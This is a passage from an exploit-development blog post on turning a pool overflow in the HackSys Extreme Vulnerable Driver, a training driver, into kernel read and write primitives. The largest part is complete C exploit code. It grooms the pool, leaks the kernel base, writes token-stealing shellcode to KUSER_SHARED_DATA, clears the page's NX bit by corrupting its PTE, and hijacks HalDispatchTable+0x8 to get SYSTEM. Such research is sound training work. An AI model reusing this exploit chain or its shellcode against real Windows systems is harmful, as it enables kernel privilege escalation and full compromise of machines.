We know that it is possible to set the Name member of an ARW_HELPER_OBJECT_NON_PAGED_POOL_NX structure via the SetArbitraryReadWriteHelperObjecNameNonPagedPoolNx function through an IOCTL invocation. Since we are now able to control the value of Name in the corrupted object, let’s see if we can’t abuse this through an arbitrary read primitive.

Let’s break this down. We know that we currently have a corrupted object with a Name member that is set to the value of another object. For brevity, we can recall this from the previous image.

If we do a “Set” operation currently on the corrupted object, shown in the dt command and currently has its Name member set to 0xffffa00ca378c210, it will perform this operation on the Name member. However, we know that the Name member is actually currently set to the value of the “main” object via the out-of-bounds write! This means that performing a “Set” operation on the corrupted object will actually take the address of the main object, since it is set in the Name member, dereference it, and write the contents specified by us. This will cause our main object to then point to whatever we specify, instead of the value of ffffa00ca378c3b0 currently outlined in the memory contents shown by dq in WinDbg. How does this turn into an arbitrary read primitive? Since our “main” object will point to whatever address we specify, the “Get” operation, if performed on the “main” object, will then dereference this address specified by us and return the value!

In WinDbg, we can “mimic” the “Set” operation as shown.

Performing the “Set” operation on the corrupted object will actually set the value of our main object to whatever is specified to the user, due to us corrupting the previous random address with the pool overflow vulnerability. At this point, performing the “Get” operation on our main object, since it was set to the value specified by the user, would dereference the value and return it to us!

At this point we need to identify what out goal is. To comprehensively bypass kASLR, our goal is as follows:

Use the base address of HEVD.sys from the original exploit in part one to provide the offset to the Import Address Table
Supply an IAT entry that points to ntoskrnl.exe to the exploit to be arbitrarily read from (thus obtaining a pointer to ntoskrnl.exe)
Calculate the distance from the pointer to the kernel to obtain the base

We can update our code to outline this. As you may recall, we have groomed the pool with 5000 ARW_HELPER_OBJECT_NON_PAGED_POOL_NX objects. However, we did not spray the pool with 5000 “vulnerable” objects. Since we have groomed the pool, we know that our vulnerable object we can arbitrarily write past will end up adjacent to one of the objects used for grooming. Since we only trigger the overflow once, and since we have already set Name values on all of the objects used for grooming, a value of 0x9090909090909090, we can simply use the “Get” operation in order to view each Name member of the objects used for grooming. If one of the objects does not contain NOPs, this is indicative that the pool overflow outlined previously to corrupt the Name value of an ARW_HELPER_OBJECT_NON_PAGED_POOL_NX has succeeded.

After this, we can then use the same primitive previously mentioned about now using the “Set” functionality in HEVD to set the Name member of the targeted corrupted object, which would actually “trick” the program to overwrite the Name member of the corrupted object, which is actually the address of the “standalone”/main ARW_HELPER_OBJECT_NON_PAGED_POOL_NX. The overwrite will dereference the standalone object, thus allowing for an arbitrary read primitive since we have the ability to then later use the “Get” functionality on the main object later.

We then can add a “press enter to continue” function to our exploit to pause execution after the main object is printed to the screen, as well as the corrupted object used for grooming that resides within the 5000 objects used for grooming.

We then can take the address 0xffff8e03c8d5c2b0, which is the corrupted object, and inspect it in WinDbg. If all goes well, this address should contain the address of the “main” object.

Comparing the Name member to the previous screenshot in which the exploit with the “press enter to continue” statement is in, we can see that the pool corruption was successful and that the Name member of one of the 5000 objects used for grooming was overwritten!

Now, if we were to use the “Set” functionality of HEVD and supply the ARW_HELPER_OBJECT_NON_PAGED_POOL object that was corrupted and also used for grooming, at address 0xffff8e03c8d5c2b0, HEVD would use the value stored in Name, dereference it, and overwrite it. This is because HEVD is expecting one of the pool allocations previously showcased for Name pointers, which we do not control. Since we have supplied another address, what HEVD will actually do is perform the overwite, but this time it will overwrite the pointer we supplied, which is another ARW_HELPER_OBJECT_NON_PAGED_POOL. Since the first member of one of these objects has a member Name, what will happen is that HEVD will actually write whatever we supply to the Name member of our main object! Let’s view this in WinDbg.

As our exploit showcased, we are using HEVD+0x2038 in this case. This value should be written to our main object.

As you can see, our main object now has its Name member pointing to HEVD+0x2038, which is a pointer to the kernel! After running the full exploit, we have now obtained the base address of HEVD from the previous exploit, and now the base of the kernel via an arbitrary read by way of pool overflow - all from low integrity!

The beauty of this technique of leveraging two objects should be clear now - we do not have to constantly perform overflows of objects in order to perform exploitation. We can now just simply use the main object to read!

Our exploitation technique will be to corrupt the page table entries of our eventual memory page our shellcode resides in. If you are not familiar with this technique, I have two blogs written on the subject, plus one about memory paging. You can find them here: one, two, and three.

For our purposes, we will need to following items arbitrarily read:

nt!MiGetPteAddress+0x13 - this contains the base of the PTEs needed for calculations
PTE bits that make up the shellcode page
[nt!HalDispatchTable+0x8] - used to execute our shellcode. We first need to preserve this address by reading it to ensure exploit stability

Let’s add a routine to address the first issue, reading the base of the page table entries. We can calculate the offset to the function MiGetPteAddress+0x13 and then use our arbitrary read primitive.

Leveraging the exact same method as before, we can see we have defeated page table randomization and have the base of the page table entries in hand!

The next step is to obtain the PTE bits that make up the shellcode page. We will eventually write our shellcode to KUSER_SHARED_DATA+0x800 in kernel mode, which is at a static address of 0xfffff87000000800. We can instrument the routine to obtain this information in C.

After running the updated exploit, we can see that we are able to leak the PTE bits for KUSER_SHARED_DATA+0x800, where our shellcode will eventually reside.

Note that the !pte extension in WinDbg was giving myself trouble. So, from the debuggee machine, I ran WinDbg “classic” with local kernel debugging (lkd) to show the contents of !pte. Notice the actual virtual address for the PTE has changed, but the contents of the PTE bits are the same. This is due to myself rebooting the machine and kASLR kicking in. The WinDbg “classic” screenshot is meant to just outline the PTE contents.

You can view this previous blog) from myself to understand the permissions KUSER_SHARED_DATA has, which is write but no execute. The last item we need is the contents of [nt!HalDispatchTable].

After executing the updated code, we can see we have preserved the value [nt!HalDispatchTable+0x8].

The last item on the agenda is the write primitive, which is 99 percent identical to the read primitive. After writing our shellcode to kernel mode and then corrupting the PTE of the shellcode page, we will be able to successfully escalate our privileges.

Arbitrary Write Primitive

Leveraging the same concepts from the arbitrary read primitive, we can also arbitrarily overwrite 64-bit pointers! Instead of using the “Get” operation in order to fetch the dereferenced contents of the Name value specified by the “corrupted” ARW_HELPER_NON_PAGED_POOL_NX object, and then returning this value to the Name value specified by the “main” object, this time we will set the Name value of the “main” object not to a pointer that receives the contents, but to the value of what we would like to overwrite memory with. In this case, we want to set this value to the value of shellcode, and then set the Name value of the “corrupted” object to KUSER_SHARED_DATA+0x800 incrementally.

From here we can run our updated exploit. Since we have created a loop to automate the writing process, we can see we are able to arbitrarily write the contents of the 9 QWORDS which make up our shellcode to KUSER_SHARED_DATA+0x800!

Awesome! We have now successfully performed the arbitrary write primitive! The next goal is to corrupt the contents of the PTE for the KUSER_SHARED_DATA+0x800 page.

From here we can use WinDbg classic to inspect the PTE before and after the write operation.

Awesome! Our exploit now just needs three more things:

Corrupt [nt!HalDispatchTable+0x8] to point to KUSER_SHARED_DATA+0x800
Invoke ntdll!NtQueryIntervalPRofile, which will perform the transition to kernel mode to invoke [nt!HalDispatchTable+0x8], thus executing our shellcode
Restore [nt!HalDispatchTable+0x8] with the arbitrary write primitive

Let’s update our exploit code to perform step one.

After executing the updated code, we can see that we have successfully overwritten nt!HalDispatchTable+0x8 with the address of KUSER_SHARED_DATA+0x800 - which contains our shellcode!

Next, we can add the routing to dynamically resolve ntdll!NtQueryIntervalProfile, invoke it, and then restore [nt!HalDispatchTable+0x8]

The final result is a SYSTEM shell from low integrity!

“…Unless We Conquer, As Conquer We Must, As Conquer We Shall.”

Hopefully you, as the reader, found this two-part series on pool corruption useful! As aforementioned in the beginning of this post, we must expect mitigations such as VBS and HVCI to be enabled in the future. ROP is still a viable alternative in the kernel due to the lack of kernel CET (kCET) at the moment (although I am sure this is subject to change). As such, techniques such as the one outlined in this blog post will soon be deprecated, leaving us with fewer options for exploitation than which we started. Data-only attacks are always viable, and there have been more novel techniques mentioned, such as this tweet sent to myself by Dmytro, which talks about leveraging ROP to forge kernel function calls even with VBS/HVCI enabled. As the title of this last section of the blog articulates, where there is a will there is a way - and although the bar will be raised, this is only par for the course with exploit development over the past few years. KPP + VBS + HVCI + kCFG/kXFG + SMEP + DEP + kASLR + kCET and many other mitigations will prove very useful for blocking most exploits. I hope that researchers stay hungry and continue to push the limits with this mitigations to find more novel ways to keep exploit development alive!

Peace, love, and positivity :-).

Here is the final exploit code, which is also available on my GitHub:

// HackSysExtreme Vulnerable Driver: Pool Overflow + Memory Disclosure
// Author: Connor McGarr (@33y0re)

#include <windows.h>
#include <stdio.h>

// typdef an ARW_HELPER_OBJECT_IO struct
typedef struct _ARW_HELPER_OBJECT_IO
{
    PVOID HelperObjectAddress;
    PVOID Name;
    SIZE_T Length;
} ARW_HELPER_OBJECT_IO, * PARW_HELPER_OBJECT_IO;

// Create a global array of ARW_HELPER_OBJECT_IO objects to manage the groomed pool allocations
ARW_HELPER_OBJECT_IO helperobjectArray[5000] = { 0 };

// Prepping call to nt!NtQueryIntervalProfile
typedef NTSTATUS(WINAPI* NtQueryIntervalProfile_t)(IN ULONG ProfileSource, OUT PULONG Interval);

// Leak the base of HEVD.sys
unsigned long long memLeak(HANDLE driverHandle)
{
    // Array to manage handles opened by CreateEventA
    HANDLE eventObjects[5000];

    // Spray 5000 objects to fill the new page
    for (int i = 0; i <= 5000; i++)
    {
        // Create the objects
        HANDLE tempHandle = CreateEventA(
            NULL,
            FALSE,
            FALSE,
            NULL
        );

        // Assign the handles to the array
        eventObjects[i] = tempHandle;
    }

    // Check to see if the first handle is a valid handle
    if (eventObjects[0] == NULL)
    {
        printf("[-] Error! Unable to spray CreateEventA objects! Error: 0x%lx\n", GetLastError());

        return 0x1;
        exit(-1);
    }
    else
    {
        printf("[+] Sprayed CreateEventA objects to fill holes of size 0x80!\n");

        // Close half of the handles
        for (int i = 0; i <= 5000; i += 2)
        {
            BOOL tempHandle1 = CloseHandle(
                eventObjects[i]
            );

            eventObjects[i] = NULL;

            // Error handling
            if (!tempHandle1)
            {
                printf("[-] Error! Unable to free the CreateEventA objects! Error: 0x%lx\n", GetLastError());

                return 0x1;
                exit(-1);
            }
        }

        printf("[+] Poked holes in the new pool page!\n");

        // Allocate UaF Objects in place of the poked holes by just invoking the IOCTL, which will call ExAllocatePoolWithTag for a UAF object
        // kLFH should automatically fill the freed holes with the UAF objects
        DWORD bytesReturned;

        for (int i = 0; i < 2500; i++)
        {
            DeviceIoControl(
                driverHandle,
                0x00222053,
                NULL,
                0,
                NULL,
                0,
                &bytesReturned,
                NULL
            );
        }

        printf("[+] Allocated objects containing a pointer to HEVD in place of the freed CreateEventA objects!\n");

        // Close the rest of the event objects
        for (int i = 1; i <= 5000; i += 2)
        {
            BOOL tempHandle2 = CloseHandle(
                eventObjects[i]
            );

            eventObjects[i] = NULL;

            // Error handling
            if (!tempHandle2)
            {
                printf("[-] Error! Unable to free the rest of the CreateEventA objects! Error: 0x%lx\n", GetLastError());

                return 0x1;
                exit(-1);
            }
        }

        // Array to store the buffer (output buffer for DeviceIoControl) and the base address
        unsigned long long outputBuffer[100];
        unsigned long long hevdBase = 0;

        // Everything is now, theoretically, [FREE, UAFOBJ, FREE, UAFOBJ, FREE, UAFOBJ], barring any more randomization from the kLFH
        // Fill some of the holes, but not all, with vulnerable chunks that can read out-of-bounds (we don't want to fill up all the way to avoid reading from a page that isn't mapped)

        for (int i = 0; i <= 100; i++)
        {
            // Return buffer
            DWORD bytesReturned1;

            DeviceIoControl(
                driverHandle,
                0x0022204f,
                NULL,
                0,
                &outputBuffer,
                sizeof(outputBuffer),
                &bytesReturned1,
                NULL
            );

        }

        printf("[+] Successfully triggered the out-of-bounds read!\n");

        // Parse the output
        for (int i = 0; i <= 100; i++)
        {
            // Kernel mode address?
            if ((outputBuffer[i] & 0xfffff00000000000) == 0xfffff00000000000)
            {
                printf("[+] Address of function pointer in HEVD.sys: 0x%llx\n", outputBuffer[i]);
                printf("[+] Base address of HEVD.sys: 0x%llx\n", outputBuffer[i] - 0x880CC);

                // Store the variable for future usage
                hevdBase = outputBuffer[i] - 0x880CC;

                // Return the value of the base of HEVD
                return hevdBase;
            }
        }
    }
}

// Function used to fill the holes in pool pages
void fillHoles(HANDLE driverHandle)
{
    // Instantiate an ARW_HELPER_OBJECT_IO
    ARW_HELPER_OBJECT_IO tempObject = { 0 };

    // Value to assign the Name member of each ARW_HELPER_OBJECT_IO
    unsigned long long nameValue = 0x9090909090909090;

    // Set the length to 0x8 so that the Name member of an ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object allocated in the pool has its Name member allocated to size 0x8, a 64-bit pointer size
    tempObject.Length = 0x8;

    // Bytes returned
    DWORD bytesreturnedFill;

    for (int i = 0; i <= 5000; i++)
    {
        // Set the Name value to 0x9090909090909090
        tempObject.Name = &nameValue;

        // Allocate a ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object with a Name member of size 0x8 and a Name value of 0x9090909090909090
        DeviceIoControl(
            driverHandle,
            0x00222063,
            &tempObject,
            sizeof(tempObject),
            &tempObject,
            sizeof(tempObject),
            &bytesreturnedFill,
            NULL
        );

        // Using non-controlled arbitrary write to set the Name member of the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object to 0x9090909090909090 via the Name member of each ARW_HELPER_OBJECT_IO
        // This will be used later on to filter out which ARW_HELPER_OBJECT_NON_PAGED_POOL_NX HAVE NOT been corrupted successfully (e.g. their Name member is 0x9090909090909090 still)
        DeviceIoControl(
            driverHandle,
            0x00222067,
            &tempObject,
            sizeof(tempObject),
            &tempObject,
            sizeof(tempObject),
            &bytesreturnedFill,
            NULL
        );

        // After allocating the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX objects (via the ARW_HELPER_OBJECT_IO objects), assign each ARW_HELPER_OBJECT_IO structures to the global managing array
        helperobjectArray[i] = tempObject;
    }

    printf("[+] Sprayed ARW_HELPER_OBJECT_IO objects to fill holes in the NonPagedPoolNx with ARW_HELPER_OBJECT_NON_PAGED_POOL_NX objects!\n");
}

// Fill up the new page within the NonPagedPoolNx with ARW_HELPER_OBJECT_NON_PAGED_POOL_NX objects
void groomPool(HANDLE driverHandle)
{
    // Instantiate an ARW_HELPER_OBJECT_IO
    ARW_HELPER_OBJECT_IO tempObject1 = { 0 };

    // Value to assign the Name member of each ARW_HELPER_OBJECT_IO
    unsigned long long nameValue1 = 0x9090909090909090;

    // Set the length to 0x8 so that the Name member of an ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object allocated in the pool has its Name member allocated to size 0x8, a 64-bit pointer size
    tempObject1.Length = 0x8;

    // Bytes returned
    DWORD bytesreturnedGroom;

    for (int i = 0; i <= 5000; i++)
    {
        // Set the Name value to 0x9090909090909090
        tempObject1.Name = &nameValue1;

        // Allocate a ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object with a Name member of size 0x8 and a Name value of 0x9090909090909090
        DeviceIoControl(
            driverHandle,
            0x00222063,
            &tempObject1,
            sizeof(tempObject1),
            &tempObject1,
            sizeof(tempObject1),
            &bytesreturnedGroom,
            NULL
        );

        // Using non-controlled arbitrary write to set the Name member of the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object to 0x9090909090909090 via the Name member of each ARW_HELPER_OBJECT_IO
        // This will be used later on to filter out which ARW_HELPER_OBJECT_NON_PAGED_POOL_NX HAVE NOT been corrupted successfully (e.g. their Name member is 0x9090909090909090 still)
        DeviceIoControl(
            driverHandle,
            0x00222067,
            &tempObject1,
            sizeof(tempObject1),
            &tempObject1,
            sizeof(tempObject1),
            &bytesreturnedGroom,
            NULL
        );

        // After allocating the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX objects (via the ARW_HELPER_OBJECT_IO objects), assign each ARW_HELPER_OBJECT_IO structures to the global managing array
        helperobjectArray[i] = tempObject1;
    }

    printf("[+] Filled the new page with ARW_HELPER_OBJECT_NON_PAGED_POOL_NX objects!\n");
}

// Free every other object in the global array to poke holes for the vulnerable objects
void pokeHoles(HANDLE driverHandle)
{
    // Bytes returned
    DWORD bytesreturnedPoke;

    // Free every other element in the global array managing objects in the new page from grooming
    for (int i = 0; i <= 5000; i += 2)
    {
        DeviceIoControl(
            driverHandle,
            0x0022206f,
            &helperobjectArray[i],
            sizeof(helperobjectArray[i]),
            &helperobjectArray[i],
            sizeof(helperobjectArray[i]),
            &bytesreturnedPoke,
            NULL
        );
    }

    printf("[+] Poked holes in the NonPagedPoolNx page containing the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX objects!\n");
}

// Create the main ARW_HELPER_OBJECT_IO
ARW_HELPER_OBJECT_IO createmainObject(HANDLE driverHandle)
{
    // Instantiate an object of type ARW_HELPER_OBJECT_IO
    ARW_HELPER_OBJECT_IO helperObject = { 0 };

    // Set the Length member which corresponds to the amount of memory used to allocate a chunk to store the Name member eventually
    helperObject.Length = 0x8;

    // Bytes returned
    DWORD bytesReturned2;

    // Invoke CreateArbitraryReadWriteHelperObjectNonPagedPoolNx to create the main ARW_HELPER_OBJECT_NON_PAGED_POOL_NX
    DeviceIoControl(
        driverHandle,
        0x00222063,
        &helperObject,
        sizeof(helperObject),
        &helperObject,
        sizeof(helperObject),
        &bytesReturned2,
        NULL
    );

    // Parse the output
    printf("[+] PARW_HELPER_OBJECT_IO->HelperObjectAddress: 0x%p\n", helperObject.HelperObjectAddress);
    printf("[+] PARW_HELPER_OBJECT_IO->Name: 0x%p\n", helperObject.Name);
    printf("[+] PARW_HELPER_OBJECT_IO->Length: 0x%zu\n", helperObject.Length);

    return helperObject;
}

// Read/write primitive
void readwritePrimitive(HANDLE driverHandle)
{
    // Store the value of the base of HEVD
    unsigned long long hevdBase = memLeak(driverHandle);

    // Store the main ARW_HELOPER_OBJECT
    ARW_HELPER_OBJECT_IO mainObject = createmainObject(driverHandle);

    // Fill the holes
    fillHoles(driverHandle);

    // Groom the pool
    groomPool(driverHandle);

    // Poke holes
    pokeHoles(driverHandle);

    // Use buffer overflow to take "main" ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object's Name value (managed by ARW_HELPER_OBJECT_IO.Name) to overwrite any of the groomed ARW_HELPER_OBJECT_NON_PAGED_POOL_NX.Name values
    // Create a buffer that first fills up the vulnerable chunk of 0x10 (16) bytes
    unsigned long long vulnBuffer[5];
    vulnBuffer[0] = 0x4141414141414141;
    vulnBuffer[1] = 0x4141414141414141;

    // Hardcode the _POOL_HEADER value for a ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object
    vulnBuffer[2] = 0x6b63614802020000;

    // Padding
    vulnBuffer[3] = 0x4141414141414141;

    // Overwrite any of the adjacent ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object's Name member with the address of the "main" ARW_HELPER_OBJECT_NON_PAGED_POOL_NX (via ARW_HELPER_OBJECT_IO.HelperObjectAddress)
    vulnBuffer[4] = mainObject.HelperObjectAddress;

    // Bytes returned
    DWORD bytesreturnedOverflow;
    DWORD bytesreturnedreadPrimtitve;

    printf("[+] Triggering the out-of-bounds-write via pool overflow!\n");

    // Trigger the pool overflow
    DeviceIoControl(
        driverHandle,
        0x0022204b,
        &vulnBuffer,
        sizeof(vulnBuffer),
        &vulnBuffer,
        0x28,
        &bytesreturnedOverflow,
        NULL
    );

    // Find which "groomed" object was overflowed
    int index = 0;
    unsigned long long placeholder = 0x9090909090909090;

    // Loop through every groomed object to find out which Name member was overwritten with the main ARW_HELPER_NON_PAGED_POOL_NX object
    for (int i = 0; i <= 5000; i++)
    {
        // The placeholder variable will be overwritten. Get operation will overwrite this variable with the real contents of each object's Name member
        helperobjectArray[i].Name = &placeholder;

        DeviceIoControl(
            driverHandle,
            0x0022206b,
            &helperobjectArray[i],
            sizeof(helperobjectArray[i]),
            &helperobjectArray[i],
            sizeof(helperobjectArray[i]),
            &bytesreturnedreadPrimtitve,
            NULL
        );

        // Loop until a Name value other than the original NOPs is found
        if (placeholder != 0x9090909090909090)
        {
            printf("[+] Found the overflowed object overwritten with main ARW_HELPER_NON_PAGED_POOL_NX object!\n");
            printf("[+] PARW_HELPER_OBJECT_IO->HelperObjectAddress: 0x%p\n", helperobjectArray[i].HelperObjectAddress);

            // Assign the index
            index = i;

            printf("[+] Array index of global array managing groomed objects: %d\n", index);

            // Break the loop
            break;
        }
    }

    // IAT entry from HEVD.sys which points to nt!ExAllocatePoolWithTag
    unsigned long long ntiatLeak = hevdBase + 0x2038;

    // Print update
    printf("[+] Target HEVD.sys address with pointer to ntoskrnl.exe: 0x%llx\n", ntiatLeak);

    // Assign the target address to the corrupted object
    helperobjectArray[index].Name = &ntiatLeak;

    // Set the Name member of the "corrupted" object managed by the global array. The main object is currently set to the Name member of one of the sprayed ARW_HELPER_OBJECT_NON_PAGED_POOL_NX that was corrupted via the pool overflow
    DeviceIoControl(
        driverHandle,
        0x00222067,
        &helperobjectArray[index],
        sizeof(helperobjectArray[index]),
        NULL,
        NULL,
        &bytesreturnedreadPrimtitve,
        NULL
    );

    // Declare variable that will receive the address of nt!ExAllocatePoolWithTag and initialize it
    unsigned long long ntPointer = 0x9090909090909090;

    // Setting the Name member of the main object to the address of the ntPointer variable. When the Name member is dereferenced and bubbled back up to user mode, it will overwrite the value of ntPointer
    mainObject.Name = &ntPointer;

    // Perform the "Get" operation on the main object, which should now have the Name member set to the IAT entry from HEVD
    DeviceIoControl(
        driverHandle,
        0x0022206b,
        &mainObject,
        sizeof(mainObject),
        &mainObject,
        sizeof(mainObject),
        &bytesreturnedreadPrimtitve,
        NULL
    );

    // Print the pointer to nt!ExAllocatePoolWithTag
    printf("[+] Leaked ntoskrnl.exe pointer! nt!ExAllocatePoolWithTag: 0x%llx\n", ntPointer);

    // Assign a variable the base of the kernel (static offset)
    unsigned long long kernelBase = ntPointer - 0x9b3160;

    // Print the base of the kernel
    printf("[+] ntoskrnl.exe base address: 0x%llx\n", kernelBase);

    // Assign a variable with nt!MiGetPteAddress+0x13
    unsigned long long migetpteAddress = kernelBase + 0x222073;

    // Print update
    printf("[+] nt!MiGetPteAddress+0x13: 0x%llx\n", migetpteAddress);

    // Assign the target address to the corrupted object
    helperobjectArray[index].Name = &migetpteAddress;

    // Set the Name member of the "corrupted" object managed by the global array to obtain the base of the PTEs
    DeviceIoControl(
        driverHandle,
        0x00222067,
        &helperobjectArray[index],
        sizeof(helperobjectArray[index]),
        NULL,
        NULL,
        &bytesreturnedreadPrimtitve,
        NULL
    );

    // Declare a variable that will receive the base of the PTEs
    unsigned long long pteBase = 0x9090909090909090;

    // Setting the Name member of the main object to the address of the pteBase variable
    mainObject.Name = &pteBase;

    // Perform the "Get" operation on the main object
    DeviceIoControl(
        driverHandle,
        0x0022206b,
        &mainObject,
        sizeof(mainObject),
        &mainObject,
        sizeof(mainObject),
        &bytesreturnedreadPrimtitve,
        NULL
    );

    // Print update
    printf("[+] Base of the page table entries: 0x%llx\n", pteBase);

    // Calculate the PTE page for our shellcode in KUSER_SHARED_DATA
    unsigned long long shellcodePte = 0xfffff78000000800 >> 9;
    shellcodePte = shellcodePte & 0x7FFFFFFFF8;
    shellcodePte = shellcodePte + pteBase;

    // Print update
    printf("[+] KUSER_SHARED_DATA+0x800 PTE page: 0x%llx\n", shellcodePte);

    // Assign the target address to the corrupted object
    helperobjectArray[index].Name = &shellcodePte;

    // Set the Name member of the "corrupted" object managed by the global array to obtain the address of the shellcode PTE page
    DeviceIoControl(
        driverHandle,
        0x00222067,
        &helperobjectArray[index],
        sizeof(helperobjectArray[index]),
        NULL,
        NULL,
        &bytesreturnedreadPrimtitve,
        NULL
    );

    // Declare a variable that will receive the PTE bits
    unsigned long long pteBits = 0x9090909090909090;

    // Setting the Name member of the main object
    mainObject.Name = &pteBits;

    // Perform the "Get" operation on the main object
    DeviceIoControl(
        driverHandle,
        0x0022206b,
        &mainObject,
        sizeof(mainObject),
        &mainObject,
        sizeof(mainObject),
        &bytesreturnedreadPrimtitve,
        NULL
    );

    // Print update
    printf("[+] PTE bits for shellcode page: %p\n", pteBits);

    // Store nt!HalDispatchTable+0x8
    unsigned long long halTemp = kernelBase + 0xc00a68;

    // Assign the target address to the corrupted object
    helperobjectArray[index].Name = &halTemp;

    // Set the Name member of the "corrupted" object managed by the global array to obtain the pointer at nt!HalDispatchTable+0x8
    DeviceIoControl(
        driverHandle,
        0x00222067,
        &helperobjectArray[index],
        sizeof(helperobjectArray[index]),
        NULL,
        NULL,
        &bytesreturnedreadPrimtitve,
        NULL
    );

    // Declare a variable that will receive [nt!HalDispatchTable+0x8]
    unsigned long long halDispatch = 0x9090909090909090;

    // Setting the Name member of the main object
    mainObject.Name = &halDispatch;

    // Perform the "Get" operation on the main object
    DeviceIoControl(
        driverHandle,
        0x0022206b,
        &mainObject,
        sizeof(mainObject),
        &mainObject,
        sizeof(mainObject),
        &bytesreturnedreadPrimtitve,
        NULL
    );

    // Print update
    printf("[+] Preserved [nt!HalDispatchTable+0x8] value: 0x%llx\n", halDispatch);

    // Arbitrary write primitive

    /*
        ; Windows 10 19H1 x64 Token Stealing Payload
        ; Author Connor McGarr
        [BITS 64]
        _start:
            mov rax, [gs:0x188]       ; Current thread (_KTHREAD)
            mov rax, [rax + 0xb8]     ; Current process (_EPROCESS)
            mov rbx, rax              ; Copy current process (_EPROCESS) to rbx
        __loop:
            mov rbx, [rbx + 0x448]    ; ActiveProcessLinks
            sub rbx, 0x448            ; Go back to current process (_EPROCESS)
            mov rcx, [rbx + 0x440]    ; UniqueProcessId (PID)
            cmp rcx, 4                ; Compare PID to SYSTEM PID
            jnz __loop                ; Loop until SYSTEM PID is found
            mov rcx, [rbx + 0x4b8]    ; SYSTEM token is @ offset _EPROCESS + 0x360
            and cl, 0xf0              ; Clear out _EX_FAST_REF RefCnt
            mov [rax + 0x4b8], rcx    ; Copy SYSTEM token to current process
            xor rax, rax              ; set NTSTATUS STATUS_SUCCESS
            ret                       ; Done!
    */

    // Shellcode
    unsigned long long shellcode[9] = { 0 };
    shellcode[0] = 0x00018825048B4865;
    shellcode[1] = 0x000000B8808B4800;
    shellcode[2] = 0x04489B8B48C38948;
    shellcode[3] = 0x000448EB81480000;
    shellcode[4] = 0x000004408B8B4800;
    shellcode[5] = 0x8B48E57504F98348;
    shellcode[6] = 0xF0E180000004B88B;
    shellcode[7] = 0x48000004B8888948;
    shellcode[8] = 0x0000000000C3C031;

    // Assign the target address to write to the corrupted object
    unsigned long long kusersharedData = 0xfffff78000000800;

    // Create a "counter" for writing the array of shellcode
    int counter = 0;

    // For loop to write the shellcode
    for (int i = 0; i <= 9; i++)
    {
        // Setting the corrupted object to KUSER_SHARED_DATA+0x800 incrementally 9 times, since our shellcode is 9 QWORDS
        // kusersharedData variable, managing the current address of KUSER_SHARED_DATA+0x800, is incremented by 0x8 at the end of each iteration of the loop
        helperobjectArray[index].Name = &kusersharedData;

        // Setting the Name member of the main object to specify what we would like to write
        mainObject.Name = &shellcode[counter];

        // Set the Name member of the "corrupted" object managed by the global array to KUSER_SHARED_DATA+0x800, incrementally
        DeviceIoControl(
            driverHandle,
            0x00222067,
            &helperobjectArray[index],
            sizeof(helperobjectArray[index]),
            NULL,
            NULL,
            &bytesreturnedreadPrimtitve,
            NULL
        );

        // Perform the arbitrary write via "set" to overwrite each QWORD of KUSER_SHARED_DATA+0x800 until our shellcode is written
        DeviceIoControl(
            driverHandle,
            0x00222067,
            &mainObject,
            sizeof(mainObject),
            NULL,
            NULL,
            &bytesreturnedreadPrimtitve,
            NULL
        );

        // Increase the counter
        counter++;

        // Increase the counter
        kusersharedData += 0x8;
    }

    // Print update
    printf("[+] Successfully wrote the shellcode to KUSER_SHARED_DATA+0x800!\n");

    // Taint the PTE contents to corrupt the NX bit in KUSER_SHARED_DATA+0x800
    unsigned long long taintedBits = pteBits & 0x0FFFFFFFFFFFFFFF;

    // Print update
    printf("[+] Tainted PTE contents: %p\n", taintedBits);

    // Leverage the arbitrary write primitive to corrupt the PTE contents

    // Setting the Name member of the corrupted object to specify where we would like to write
    helperobjectArray[index].Name = &shellcodePte;

    // Specify what we would like to write (the tainted PTE contents)
    mainObject.Name = &taintedBits;

    // Set the Name member of the "corrupted" object managed by the global array to KUSER_SHARED_DATA+0x800's PTE virtual address
    DeviceIoControl(
        driverHandle,
        0x00222067,
        &helperobjectArray[index],
        sizeof(helperobjectArray[index]),
        NULL,
        NULL,
        &bytesreturnedreadPrimtitve,
        NULL
    );

    // Perform the arbitrary write
    DeviceIoControl(
        driverHandle,
        0x00222067,
        &mainObject,
        sizeof(mainObject),
        NULL,
        NULL,
        &bytesreturnedreadPrimtitve,
        NULL
    );

    // Print update
    printf("[+] Successfully corrupted the PTE of KUSER_SHARED_DATA+0x800! This region should now be marked as RWX!\n");

    // Leverage the arbitrary write primitive to overwrite nt!HalDispatchTable+0x8

    // Reset kusersharedData
    kusersharedData = 0xfffff78000000800;

    // Setting the Name member of the corrupted object to specify where we would like to write
    helperobjectArray[index].Name = &halTemp;

    // Specify where we would like to write (the address of KUSER_SHARED_DATA+0x800)
    mainObject.Name = &kusersharedData;

    // Set the Name member of the "corrupted" object managed by the global array to nt!HalDispatchTable+0x8
    DeviceIoControl(
        driverHandle,
        0x00222067,
        &helperobjectArray[index],
        sizeof(helperobjectArray[index]),
        NULL,
        NULL,
        &bytesreturnedreadPrimtitve,
        NULL
    );

    // Perform the arbitrary write
    DeviceIoControl(
        driverHandle,
        0x00222067,
        &mainObject,
        sizeof(mainObject),
        NULL,
        NULL,
        &bytesreturnedreadPrimtitve,
        NULL
    );

    // Print update
    printf("[+] Successfully corrupted [nt!HalDispatchTable+0x8]!\n");

    // Locating nt!NtQueryIntervalProfile
    NtQueryIntervalProfile_t NtQueryIntervalProfile = (NtQueryIntervalProfile_t)GetProcAddress(
        GetModuleHandle(
            TEXT("ntdll.dll")),
        "NtQueryIntervalProfile"
    );

    // Error handling
    if (!NtQueryIntervalProfile)
    {
        printf("[-] Error! Unable to find ntdll!NtQueryIntervalProfile! Error: %d\n", GetLastError());
        exit(1);
    }

    // Print update for found ntdll!NtQueryIntervalProfile
    printf("[+] Located ntdll!NtQueryIntervalProfile at: 0x%llx\n", NtQueryIntervalProfile);

    // Calling nt!NtQueryIntervalProfile
    ULONG exploit = 0;
    NtQueryIntervalProfile(
        0x1234,
        &exploit
    );

    // Print update
